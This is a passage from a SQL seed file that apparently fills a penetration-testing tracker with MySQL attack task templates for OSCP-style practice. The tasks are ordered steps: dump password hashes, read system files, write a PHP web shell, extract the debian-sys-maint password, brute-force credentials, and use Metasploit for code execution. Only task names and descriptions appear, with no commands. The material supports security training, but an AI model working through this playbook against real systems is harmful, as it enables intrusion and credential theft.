    (SELECT id FROM plugin_task_templates WHERE task_id = 'mysql-enum-root' AND plugin_id = (SELECT id FROM service_plugins WHERE name = 'mysql')),
    'mysql-banner-grab',
    2,
    'Identify MySQL version via banner (no auth needed)',
    '["OSCP:HIGH", "QUICK_WIN", "MANUAL"]'
);

-- Task 2: Nmap NSE (priority 3)
INSERT INTO plugin_task_templates (
    plugin_id, task_id, task_name, task_type, parent_task_id,
    command_id, priority, description, tags
) VALUES (
    (SELECT id FROM service_plugins WHERE name = 'mysql'),
    'mysql-nmap',
    'Nmap NSE Scripts',
    'command',
    (SELECT id FROM plugin_task_templates WHERE task_id = 'mysql-enum-root' AND plugin_id = (SELECT id FROM service_plugins WHERE name = 'mysql')),
    'mysql-nmap-enum',
    3,
    'Comprehensive MySQL enumeration via NSE scripts',
    '["OSCP:HIGH", "AUTOMATED"]'
);

-- Task 3: Authenticated Enumeration (PARENT TASK - priority 4)
INSERT INTO plugin_task_templates (
    plugin_id, task_id, task_name, task_type, parent_task_id,
    command_id, priority, description, tags
) VALUES (
    (SELECT id FROM service_plugins WHERE name = 'mysql'),
    'mysql-auth-enum',
    'Authenticated Enumeration (Use Valid Creds)',
    'parent',
    (SELECT id FROM plugin_task_templates WHERE task_id = 'mysql-enum-root' AND plugin_id = (SELECT id FROM service_plugins WHERE name = 'mysql')),
    NULL,
    4,
    'Enumeration tasks requiring valid MySQL credentials',
    '["OSCP:HIGH", "REQUIRES_AUTH"]'
);

-- Task 3a: Show grants (nested under auth-enum)
INSERT INTO plugin_task_templates (
    plugin_id, task_id, task_name, task_type, parent_task_id,
    command_id, priority, description, tags
) VALUES (
    (SELECT id FROM service_plugins WHERE name = 'mysql'),
    'mysql-show-grants-task',
    'Check current privileges',
    'command',
    (SELECT id FROM plugin_task_templates WHERE task_id = 'mysql-auth-enum' AND plugin_id = (SELECT id FROM service_plugins WHERE name = 'mysql')),
    'mysql-show-grants',
    5,
    'Enumerate privileges (FILE and SUPER are critical)',
    '["OSCP:HIGH", "MANUAL", "REQUIRES_AUTH"]'
);

-- Task 3b: Dump users (nested under auth-enum)
INSERT INTO plugin_task_templates (
    plugin_id, task_id, task_name, task_type, parent_task_id,
    command_id, priority, description, tags
) VALUES (
    (SELECT id FROM service_plugins WHERE name = 'mysql'),
    'mysql-enum-users-task',
    'Dump users and hashes',
    'command',
    (SELECT id FROM plugin_task_templates WHERE task_id = 'mysql-auth-enum' AND plugin_id = (SELECT id FROM service_plugins WHERE name = 'mysql')),
    'mysql-enum-users',
    6,
    'Extract user list with password hashes and privileges',
    '["OSCP:HIGH", "REQUIRES_AUTH"]'
);

-- Task 3c: List databases (nested under auth-enum)
INSERT INTO plugin_task_templates (
    plugin_id, task_id, task_name, task_type, parent_task_id,
    command_id, priority, description, tags
) VALUES (
    (SELECT id FROM service_plugins WHERE name = 'mysql'),
    'mysql-enum-databases-task',
    'List databases',
    'command',
    (SELECT id FROM plugin_task_templates WHERE task_id = 'mysql-auth-enum' AND plugin_id = (SELECT id FROM service_plugins WHERE name = 'mysql')),
    'mysql-enum-databases',
    7,
    'Enumerate accessible databases',
    '["OSCP:MEDIUM", "REQUIRES_AUTH"]'
);

-- Task 4: File Operations (priority 8-10)
INSERT INTO plugin_task_templates (
    plugin_id, task_id, task_name, task_type, parent_task_id,
    command_id, priority, description, tags
) VALUES (
    (SELECT id FROM service_plugins WHERE name = 'mysql'),
    'mysql-check-file-priv',
    'Check file operation restrictions',
    'command',
    (SELECT id FROM plugin_task_templates WHERE task_id = 'mysql-enum-root' AND plugin_id = (SELECT id FROM service_plugins WHERE name = 'mysql')),
    'mysql-check-secure-file-priv',
    8,
    'Check if file operations are restricted',
    '["OSCP:HIGH", "QUICK_WIN", "REQUIRES_AUTH"]'
);

INSERT INTO plugin_task_templates (
    plugin_id, task_id, task_name, task_type, parent_task_id,
    command_id, priority, description, tags
) VALUES (
    (SELECT id FROM service_plugins WHERE name = 'mysql'),
    'mysql-read-files',
    'Read system files',
    'command',
    (SELECT id FROM plugin_task_templates WHERE task_id = 'mysql-enum-root' AND plugin_id = (SELECT id FROM service_plugins WHERE name = 'mysql')),
    'mysql-read-file',
    9,
    'Read arbitrary files (requires FILE privilege)',
    '["OSCP:HIGH", "REQUIRES_AUTH"]'
);

INSERT INTO plugin_task_templates (
    plugin_id, task_id, task_name, task_type, parent_task_id,
    command_id, priority, description, tags
) VALUES (
    (SELECT id FROM service_plugins WHERE name = 'mysql'),
    'mysql-write-webshell',
    'Write web shell (INTO OUTFILE)',
    'command',
    (SELECT id FROM plugin_task_templates WHERE task_id = 'mysql-enum-root' AND plugin_id = (SELECT id FROM service_plugins WHERE name = 'mysql')),
    'mysql-write-shell',
    10,
    'Write PHP web shell (requires FILE priv + web root write access)',
    '["OSCP:HIGH", "REQUIRES_AUTH"]'
);

-- Task 5: Credential Extraction (priority 11-13)
INSERT INTO plugin_task_templates (
    plugin_id, task_id, task_name, task_type, parent_task_id,
    command_id, priority, description, tags
) VALUES (
    (SELECT id FROM service_plugins WHERE name = 'mysql'),
    'mysql-debian-config',
    'Extract debian-sys-maint password',
    'command',
    (SELECT id FROM plugin_task_templates WHERE task_id = 'mysql-enum-root' AND plugin_id = (SELECT id FROM service_plugins WHERE name = 'mysql')),
    'mysql-debian-cnf',
    11,
    'Extract plaintext password for maintenance user (Debian/Ubuntu)',
    '["OSCP:HIGH", "QUICK_WIN", "LINUX", "REQUIRES_SHELL"]'
);

INSERT INTO plugin_task_templates (
    plugin_id, task_id, task_name, task_type, parent_task_id,
    command_id, priority, description, tags
) VALUES (
    (SELECT id FROM service_plugins WHERE name = 'mysql'),
    'mysql-crack',
    'Crack password hashes',
    'command',
    (SELECT id FROM plugin_task_templates WHERE task_id = 'mysql-enum-root' AND plugin_id = (SELECT id FROM service_plugins WHERE name = 'mysql')),
    'mysql-crack-hashes',
    12,
    'Offline hash cracking (mysql_native_password)',
    '["OSCP:MEDIUM"]'
);

-- Task 6: Brute Force (priority 15 - low priority)
INSERT INTO plugin_task_templates (
    plugin_id, task_id, task_name, task_type, parent_task_id,
    command_id, priority, description, tags
) VALUES (
    (SELECT id FROM service_plugins WHERE name = 'mysql'),
    'mysql-bruteforce',
    'Credential Brute-force (LAST RESORT)',
    'command',
    (SELECT id FROM plugin_task_templates WHERE task_id = 'mysql-enum-root' AND plugin_id = (SELECT id FROM service_plugins WHERE name = 'mysql')),
    'mysql-hydra-bruteforce',
    15,
    'Brute-force credentials (very noisy, slow, often fails)',
    '["OSCP:LOW", "NOISY"]'
);

-- Task 7: Metasploit automation (priority 13-14)
INSERT INTO plugin_task_templates (
    plugin_id, task_id, task_name, task_type, parent_task_id,
    command_id, priority, description, tags
) VALUES (
    (SELECT id FROM service_plugins WHERE name = 'mysql'),
    'mysql-msf-hashdump-task',
    'MSF: Hash dump',
    'command',
    (SELECT id FROM plugin_task_templates WHERE task_id = 'mysql-enum-root' AND plugin_id = (SELECT id FROM service_plugins WHERE name = 'mysql')),
    'mysql-msf-hashdump',
    13,
    'Automated hash dumping via Metasploit (requires creds)',
    '["OSCP:MEDIUM", "AUTOMATED", "REQUIRES_AUTH"]'
);

INSERT INTO plugin_task_templates (
    plugin_id, task_id, task_name, task_type, parent_task_id,
    command_id, priority, description, tags
) VALUES (
    (SELECT id FROM service_plugins WHERE name = 'mysql'),
    'mysql-msf-udf-task',
    'MSF: UDF code execution',
    'command',
    (SELECT id FROM plugin_task_templates WHERE task_id = 'mysql-enum-root' AND plugin_id = (SELECT id FROM service_plugins WHERE name = 'mysql')),
    'mysql-msf-udf',
    14,
    'Automated UDF privilege escalation via Metasploit',
    '["OSCP:MEDIUM", "AUTOMATED", "EXPLOIT", "REQUIRES_AUTH"]'
);

-- Task 8: Config files (priority 16-17)
INSERT INTO plugin_task_templates (
    plugin_id, task_id, task_name, task_type, parent_task_id,
    command_id, priority, description, tags
) VALUES (
    (SELECT id FROM service_plugins WHERE name = 'mysql'),
    'mysql-find-config-files',
    'Locate configuration files',
    'command',
    (SELECT id FROM plugin_task_templates WHERE task_id = 'mysql-enum-root' AND plugin_id = (SELECT id FROM service_plugins WHERE name = 'mysql')),
    'mysql-find-configs',
    16,
    'Find all MySQL configuration files (may contain passwords)',
    '["OSCP:MEDIUM", "LINUX", "WINDOWS", "REQUIRES_SHELL"]'
);

INSERT INTO plugin_task_templates (
    plugin_id, task_id, task_name, task_type, parent_task_id,
    command_id, priority, description, tags
) VALUES (
    (SELECT id FROM service_plugins WHERE name = 'mysql'),
    'mysql-command-history',
    'Check MySQL command history',
    'command',
    (SELECT id FROM plugin_task_templates WHERE task_id = 'mysql-enum-root' AND plugin_id = (SELECT id FROM service_plugins WHERE name = 'mysql')),
    'mysql-history',
    17,
    'Read MySQL shell command history (may contain credentials, queries)',
    '["OSCP:HIGH", "QUICK_WIN", "LINUX", "REQUIRES_SHELL"]'
);

COMMIT;

-- =============================================================================
-- Validation Queries
-- =============================================================================

-- Check MySQL commands
-- SELECT COUNT(*) FROM commands WHERE subcategory = 'mysql';
-- Expected: 16

-- Check MySQL task templates
-- SELECT COUNT(*) FROM plugin_task_templates
-- WHERE plugin_id = (SELECT id FROM service_plugins WHERE name = 'mysql');
-- Expected: 18 (1 root + 1 auth-enum parent + 16 command tasks)

-- View nested task hierarchy
-- SELECT
--     ptt.priority,
--     ptt.task_id,
--     ptt.task_name,
--     ptt.task_type,
--     parent.task_id AS parent_task_id,
--     c.name as command_name
-- FROM plugin_task_templates ptt
-- LEFT JOIN plugin_task_templates parent ON ptt.parent_task_id = parent.id
-- LEFT JOIN commands c ON ptt.command_id = c.id
-- WHERE ptt.plugin_id = (SELECT id FROM service_plugins WHERE name = 'mysql')
-- ORDER BY ptt.priority;
